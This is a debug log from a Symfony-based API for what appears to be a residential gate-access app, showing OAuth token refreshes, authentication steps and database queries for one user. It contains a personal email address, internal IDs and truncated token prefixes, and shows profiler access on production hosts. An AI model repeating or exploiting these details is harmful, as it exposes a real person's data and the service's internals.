[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:49:32] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:49:32] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:49:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:49:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:32] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:32] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:49:32] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:32] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:32] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:49:32] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:49:37] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:49:37] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:49:37] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:49:37] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:49:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:49:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:37] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:37] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:49:37] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:37] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:37] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:49:37] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:50:04] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-21 00:50:04] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["9475b21af35afb95ae7be847dc [...]"] []
[2025-12-21 00:50:04] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:50:04] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"b0a4a4a06dc850d0f64ce4e341 [...]","3":"2025-12-21 01:20:04","4":"","5":398,"6":"[]"} []
[2025-12-21 00:50:04] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:50:04] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:50:04] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"7967d8158dd3144b86d148b136 [...]","3":"2026-02-19 00:50:04","4":"","5":398,"6":"[]"} []
[2025-12-21 00:50:04] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:50:04] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:50:04] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"9475b21af35afb95ae7be847dc [...]"] []
[2025-12-21 00:50:04] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:50:04] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:50:04] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:04] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:50:04] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:50:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:50:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:04] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:04] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:04] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:04] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:04] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:50:05] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:05] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:50:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:50:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:50:14] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:50:14] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:14] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:50:14] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:50:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:50:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:14] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:14] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:14] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:14] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:14] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:50:14] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:50:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"22b906","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/22b906","method":"GET"} []
[2025-12-21 00:50:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 00:50:28] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
